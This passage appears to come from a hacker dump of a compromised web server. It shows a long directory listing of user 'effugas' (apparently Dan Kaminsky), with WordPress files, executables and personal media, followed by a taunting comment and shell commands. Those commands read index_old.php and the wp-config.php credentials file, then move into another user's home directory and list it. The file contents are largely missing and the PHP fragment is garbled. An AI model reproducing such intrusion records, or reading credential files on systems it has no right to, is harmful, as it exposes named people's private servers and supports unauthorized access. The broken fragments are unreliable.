Jan 31 2008 toolbars.gif -rw-r--r-- 1 effugas effugas 78 Nov 14 2002 top.html -rw-r--r-- 1 effugas effugas 1491 Nov 14 2002 trace.txt -rw-r--r-- 1 effugas effugas 182532 Nov 14 2002 tracerpulse.txt drwxr-xr-x 2 effugas effugas 512 Feb 11 2007 traffic drwxr-xr-x 2 effugas effugas 512 Feb 13 2007 traffic2 -rw-r--r-- 1 effugas effugas 43 Jan 31 2008 trans.gif -rw-r--r-- 1 effugas effugas 90214 Nov 2 2005 trespass.pdf -rw-r--r-- 1 effugas effugas 93136 Nov 3 2005 trespass2.pdf -rw-r--r-- 1 effugas effugas 4969 Apr 5 2006 tw-sack.js -rwxr-xr-x 1 effugas effugas 1574638 Jul 31 2006 two_dlls.png -rw-r--r-- 1 effugas effugas 3692 Jun 27 2008 ui.core.js -rw-r--r-- 1 effugas effugas 15497 Apr 14 2008 ui.css -rw-r--r-- 1 effugas effugas 10338 Jun 27 2008 ui.sortable.js -rw-r--r-- 1 effugas effugas 6194 Jun 27 2008 ui.tabs.js -rw-r--r-- 1 effugas effugas 49618 Sep 1 2006 ultimate_tattoo.jpg -rwxr-xr-x 1 effugas effugas 197632 Jul 23 2003 ultravnc.exe -rw-r--r-- 1 effugas effugas 9755 Nov 6 2005 under_the_bay.jpg -rw-r--r-- 1 effugas effugas 4686 May 8 2004 uni.txt -rw-r--r-- 1 effugas effugas 20197 Mar 2 2008 unittest.js -rw-r--r-- 1 effugas effugas 
3918665 Jun 28 2004 unnamed.tgz -rw-r--r-- 1 effugas effugas 1426 May 20 2008 update-links.php -rw-r--r-- 1 effugas effugas 7255 Jul 11 2008 update.php -rw-r--r-- 1 effugas effugas 188 Mar 21 2008 upgrade-functions.php -rw-r--r-- 1 effugas effugas 48179 Jun 26 2008 upgrade.php -rw-r--r-- 1 effugas effugas 131 Mar 22 2008 upload-rtl.css -rw-r--r-- 1 effugas effugas 13224 Mar 15 2008 upload.js -rw-r--r-- 1 effugas effugas 8138 May 4 2008 upload.php -rw-r--r-- 1 effugas effugas 100738 Oct 28 2002 urandom1.jpg drwxrwxrwx 2 effugas effugas 4608 Sep 1 2007 usage -rw-r--r-- 1 effugas effugas 11602 Jun 23 2008 user-edit.php -rw-r--r-- 1 effugas effugas 13174 Jun 25 2008 user.php -rw-r--r-- 1 effugas effugas 49 Mar 2 2008 users.js -rw-r--r-- 1 effugas effugas 14307 May 27 2008 users.php drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 utils -rw-r--r-- 1 effugas effugas 6690 Feb 27 2008 utw.php -rwxr-xr-x 1 effugas effugas 52818 Feb 21 2006 v2DanKFeb06.PDF -rwxr-xr-x 1 effugas effugas 105472 Feb 22 2005 va.exe -rw-r--r-- 1 effugas effugas 4764 Jun 4 2008 validate.js -rw-r--r-- 1 effugas effugas 2417 Jan 4 2008 vars.php -rw-r--r-- 1 effugas effugas 36904 Jul 22 2001 vasegallery.jpg -rw-r--r-- 1 effugas effugas 604 Dec 9 2004 vec1.html -rw-r--r-- 1 effugas effugas 788 Dec 10 2004 vec1_big.html -rw-r--r-- 1 effugas effugas 122553 Dec 28 2004 vec1_c.html -rw-r--r-- 1 effugas effugas 604 Dec 9 2004 vec2.html -rw-r--r-- 1 effugas effugas 788 Dec 10 2004 vec2_big.html -rw-r--r-- 1 effugas effugas 122553 Dec 28 2004 vec2_c.html -rw-r--r-- 1 effugas effugas 13 Jun 1 01:52 verify_1317e0e43d7d72.html -rw-r--r-- 1 effugas effugas 372 Jul 14 2008 version.php -rw-r--r-- 1 effugas effugas 92 Jan 17 2008 vertical.gif drwxr-xr-x 2 effugas effugas 512 Sep 2 2004 vid -rw-r--r-- 1 effugas effugas 99 Jul 3 2008 video.gif -rw-r--r-- 1 effugas effugas 2372 Feb 28 2008 video.png drwxr-xr-x 5 effugas effugas 512 Sep 23 2008 vidsim -rw-r--r-- 1 effugas effugas 630 Feb 2 2006 violins.asx -rw-r--r-- 1 
effugas effugas 672 Feb 2 2006 violins.smi -rw-r--r-- 1 effugas effugas 5228 Feb 2 2006 vml.html -rw-r--r-- 1 effugas effugas 1165 Feb 2 2006 vml2.html -rw-r--r-- 1 effugas effugas 1178 Feb 2 2006 vml3.html -rw-r--r-- 1 effugas effugas 1641642 Feb 8 2005 voicemail.mp3 drwxr-xr-x 2 effugas effugas 512 Nov 15 2002 vol -rw-r--r-- 1 effugas effugas 106130 Dec 14 2004 w32dns.zip -rw-r--r-- 1 effugas effugas 763750 Nov 9 2006 walter.zip -rw-r--r-- 1 effugas effugas 141 Nov 18 2006 warning.html -rw-r--r-- 1 effugas effugas 3594 Aug 18 2006 wash_your_mouth_out_with_soap.html -rw-r--r-- 1 effugas effugas 424 Nov 14 2002 webcache.html -rw-r--r-- 1 effugas effugas 210717 Mar 26 2003 weilsigs.pdf -rw-r--r-- 1 effugas effugas 452841 Feb 25 2003 weilsigs.ps drwxr-xr-x 2 effugas effugas 512 Jun 7 2004 whoa -rw-r--r-- 1 effugas effugas 33721 Jun 5 2007 why_you_do_this.jpg -rw-r--r-- 1 effugas effugas 1027 May 20 2008 widgets-rtl.css -rw-r--r-- 1 effugas effugas 3211 May 21 2008 widgets.css -rw-r--r-- 1 effugas effugas 4704 May 3 2008 widgets.js -rw-r--r-- 1 effugas effugas 9986 Jul 4 2008 widgets.php -rw-r--r-- 1 effugas effugas 81546 Nov 14 2002 win_ie6.png -rw-r--r-- 1 effugas effugas 72482 Nov 14 2002 win_moz11.png -rw-r--r-- 1 effugas effugas 7068 Apr 14 2008 window.css -rw-r--r-- 1 effugas effugas 415 Jan 17 2008 windowsmedia.gif -rw-r--r-- 1 effugas effugas 48738 Sep 19 2002 wire_1.0.pdf -rw-r--r-- 1 effugas effugas 64587 Dec 12 2002 wire_1.1.pdf -rw-r--r-- 1 effugas effugas 53316 Feb 11 2001 wires.jpg -rw-r--r-- 1 effugas effugas 46 Jan 17 2008 wline.gif drwxr-xr-x 2 effugas effugas 512 Jul 15 2008 wlw -rw-r--r-- 1 effugas effugas 1013 Oct 8 2007 wlwmanifest.xml -rw-r--r-- 1 effugas effugas 967 Jun 3 2008 word-count.js -rw-r--r-- 1 effugas effugas 162 Jan 29 2006 word.html drwxr-xr-x 5 effugas effugas 1024 Aug 19 2008 wordpress -rw-r--r-- 1 effugas effugas 1302795 Aug 19 2008 wordpress-2.6.tar.gz -rw-r--r-- 1 effugas effugas 2334 Feb 18 2008 wordpress-logo.png -rw-r--r-- 1 
effugas effugas 1475 Jul 11 2008 wordpress.css -rw-r--r-- 1 effugas effugas 24049 May 20 2008 wordpress.php -rw-r--r-- 1 effugas effugas 91190 Sep 3 2006 workout.png drwxr-xrwx 7 effugas effugas 1024 Sep 26 2005 wp drwxr-xr-x 7 effugas effugas 2048 Aug 24 2008 wp-admin -rw-r--r-- 1 effugas effugas 25511 Jul 10 2008 wp-admin.css -rw-r--r-- 1 effugas effugas 2921 Mar 20 2008 wp-ajax-response.js -rw-r--r-- 1 effugas effugas 34072 Aug 24 2008 wp-app.php -rw-r--r-- 1 effugas effugas 555 Aug 24 2008 wp-atom.php -rw-r--r-- 1 effugas effugas 274 Aug 24 2008 wp-blog-header.php -rw-r--r-- 1 effugas effugas 16961 Jul 7 2008 wp-cat2tag.php -rw-r--r-- 1 effugas effugas 3091 Aug 24 2008 wp-comments-post.php -rw-r--r-- 1 effugas effugas 1442 Oct 8 2007 wp-comments.png -rw-r--r-- 1 effugas effugas 625 Aug 24 2008 wp-commentsrss2.php -rw-r--r-- 1 effugas effugas 1569 Aug 24 2008 wp-config-sample.php -rw-r--r-- 1 effugas effugas 1374 Aug 24 2008 wp-config.php drwxr-xr-x 6 effugas effugas 512 Aug 24 2008 wp-content -rw-r--r-- 1 effugas effugas 1257 Aug 24 2008 wp-cron.php -rw-r--r-- 1 effugas effugas 24346 Jul 10 2008 wp-db.php -rw-r--r-- 1 effugas effugas 10111 Jul 6 2008 wp-diff.php -rw-r--r-- 1 effugas effugas 661 Aug 24 2008 wp-feed.php -rw-r--r-- 1 effugas effugas 2396 May 19 2008 wp-gears.js -rw-r--r-- 1 effugas effugas 779 Oct 8 2007 wp-icon.png drwxr-xr-x 5 effugas effugas 2048 Aug 24 2008 wp-includes -rw-r--r-- 1 effugas effugas 22612 Jul 10 2008 wp-langs.php -rw-r--r-- 1 effugas effugas 1986 Aug 24 2008 wp-links-opml.php -rw-r--r-- 1 effugas effugas 11635 Apr 14 2008 wp-lists.js -rw-r--r-- 1 effugas effugas 1950 Aug 24 2008 wp-load.php -rw-r--r-- 1 effugas effugas 19219 Aug 24 2008 wp-login.php -rw-r--r-- 1 effugas effugas 6404 Aug 24 2008 wp-mail.php -rw-r--r-- 1 effugas effugas 12566 Jun 27 2008 wp-mce-help.php -rw-r--r-- 1 effugas effugas 487 Aug 24 2008 wp-pass.php -rw-r--r-- 1 effugas effugas 473 Aug 24 2008 wp-rdf.php -rw-r--r-- 1 effugas effugas 316 Aug 24 2008 
wp-register.php -rw-r--r-- 1 effugas effugas 484 Aug 24 2008 wp-rss.php -rw-r--r-- 1 effugas effugas 555 Aug 24 2008 wp-rss2.php -rw-r--r-- 1 effugas effugas 2617 Mar 2 2008 wp-scriptaculous.js -rw-r--r-- 1 effugas effugas 17172 Aug 24 2008 wp-settings.php drwxr-xr-x 3 effugas effugas 512 Jul 24 2008 wp-super-cache -rw-r--r-- 1 effugas effugas 29906 Jul 8 2008 wp-super-cache.0.6.4.zip -rw-r--r-- 1 effugas effugas 31102 Jul 24 2008 wp-super-cache.0.6.5.zip -rw-r--r-- 1 effugas effugas 3434 Aug 24 2008 wp-trackback.php -rw-r--r-- 1 effugas effugas 8280 Oct 8 2007 wp-watermark.png drwxr-xr-x 3 effugas effugas 512 Aug 19 2008 wp_theme drwxr-xr-x 5 effugas effugas 512 Aug 19 2008 wpeditimage -rw-r--r-- 1 effugas effugas 65 Apr 1 2007 wpf.html drwxr-xr-x 9 effugas effugas 512 Mar 16 2005 writings drwxr-xr-x 6 effugas effugas 512 Oct 17 2005 wtf -rw-r--r-- 1 effugas effugas 986 Nov 14 2002 wtf.html -rwxr-xr-x 1 effugas effugas 14529 Sep 26 2005 wtf.log drwxr-xr-x 2 effugas effugas 512 Apr 2 2006 wtf2 drwxr-xr-x 2 effugas effugas 512 Oct 12 2005 x drwxr-xr-x 5 effugas effugas 1024 Jan 21 2002 x10 -rw-r--r-- 1 effugas effugas 2231 Apr 18 2008 xdiff.php -rw-r--r-- 1 effugas effugas 1293 Jun 1 2007 xfn.js -rw-r--r-- 1 effugas effugas 181 Jan 2 2008 xit.gif -rw-r--r-- 1 effugas effugas 75403 Aug 24 2008 xmlrpc.php drwxr-xr-x 2 effugas effugas 512 Dec 28 2005 xovi -rw-r--r-- 1 effugas effugas 586 Feb 20 08:16 xqid.txt -rw-r--r-- 1 effugas effugas 187 Feb 1 2006 yack.html -rwxr-xr-x 1 effugas effugas 2566180 Nov 24 2005 yed.jar -rwxrwxrwx 1 effugas effugas 9041858 Aug 6 2008 yellow-7days-with-percentage.avi -rw-r--r-- 1 effugas effugas 612 Jul 9 2008 yes.png -rw-r--r-- 1 effugas effugas 4463377 Aug 8 2006 zelda32.png -rw-r--r-- 1 effugas effugas 29121 Dec 8 2003 zen.html -rw-r--r-- 1 effugas effugas 14631 Dec 8 2003 zen.txt -rw-r--r-- 1 effugas effugas 1270 Feb 21 2008 zip.png -rw-r--r-- 1 effugas effugas 86 Feb 6 2006 zippo2.html -rw-r--r-- 1 effugas effugas 923947 Nov 4 2008 
zombie2.swf -rw-r--r-- 1 effugas effugas 673 Nov 4 2008 zombie2.swf.html // Here comes some leet PHP that looks so old school it probably predates PHP $ cat index_old.php
/ Dan "Effugas" Kaminsky "; } ?>"; } ?>
$ cat wp-config.php
$ cd /home/thalakan
$ ls -la